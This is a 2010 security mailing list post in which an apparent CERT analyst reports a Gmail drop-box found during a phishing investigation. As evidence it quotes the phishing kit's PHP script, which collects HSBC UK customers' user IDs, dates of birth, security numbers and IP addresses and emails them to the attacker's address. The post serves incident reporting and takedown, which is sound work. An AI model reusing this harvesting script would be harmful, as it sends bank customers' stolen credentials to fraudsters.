[nsp-sec] gmail phishing drop-box
Rodolfo Baader
rbaader at arcert.gov.ar
Tue Mar 30 12:02:35 EDT 2010
Hi!
while investigating a phishing case, we've found the following dropbox:
"newday.sam at gmail.com"
Evidence:
==============================================================================
<?php
$hostname = gethostbyaddr($ip);
$message = "-----------------+ HSBC UK Bank Spam ReZulT +-----------------\n";
$message .= "User ID : $user\n";
$message .= "Date of Birth : $dob\n";
$message .= "Security Number : $securityno\n";
$message .= "---------------------\n";
$message .= "IP Address : $ip\n";
$message .= "HostName : $hostname\n";
$message .= "----------------+ Created in 2009 By Gooodshot +----------------\n";
$send="newday.sam at gmail.com";
$subject = "HSBC UK Bank ReZulT | $user | $ip";
$headers = "From: Gooodshot<new at yahoo.com>";
$str=array($send, $IP); foreach ($str as $send)
if(mail($send,$subject,$message,$headers) != false){
mail($Send,$subject,$message,$headers);
}
?>
==============================================================================
Regards,
R.
More information about the nsp-security
mailing list